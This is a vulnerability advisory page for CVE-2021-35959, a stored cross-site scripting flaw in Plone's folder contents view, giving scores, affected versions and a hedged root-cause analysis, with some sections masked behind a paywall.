Miggo Logo

CVE-2021-35959: Plone has stored XSS in folder contents

6.1

CVSS Score
3.1

Basic Information

EPSS Score
0.65064%
Published
5/24/2022
Updated
10/18/2024
KEV Status
No
Technology
TechnologyPython

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Package NameEcosystemVulnerable VersionsFirst Patched Version
plonepip>= 5.0, <= 5.2.4

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from improper output sanitization in the folder contents view template. The advisory indicates the XSS occurs when a folder's description containing a SCRIPT tag is rendered. Plone's folder contents view uses the listing.pt template (part of plone.app.content) to display metadata, including descriptions. The template likely used 'structure' keyword or similar unsafe rendering for the description field, allowing raw HTML injection. The hotfix addressed this by implementing proper escaping, confirming the template rendering mechanism was the vulnerable component.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

In Plon* *.* t*rou** *.*.*, **itors *r* vuln*r**l* to XSS in t** *ol**r *ont*nts vi*w, i* * *ontri*utor **s *r**t** * *ol**r wit* * S*RIPT t** in t** **s*ription *i*l*.

Reasoning

T** vuln*r**ility st*ms *rom improp*r output s*nitiz*tion in t** *ol**r *ont*nts vi*w t*mpl*t*. T** **visory in*i**t*s t** XSS o**urs w**n * *ol**r's **s*ription *ont*inin* * S*RIPT t** is r*n**r**. Plon*'s *ol**r *ont*nts vi*w us*s t** `listin*.pt`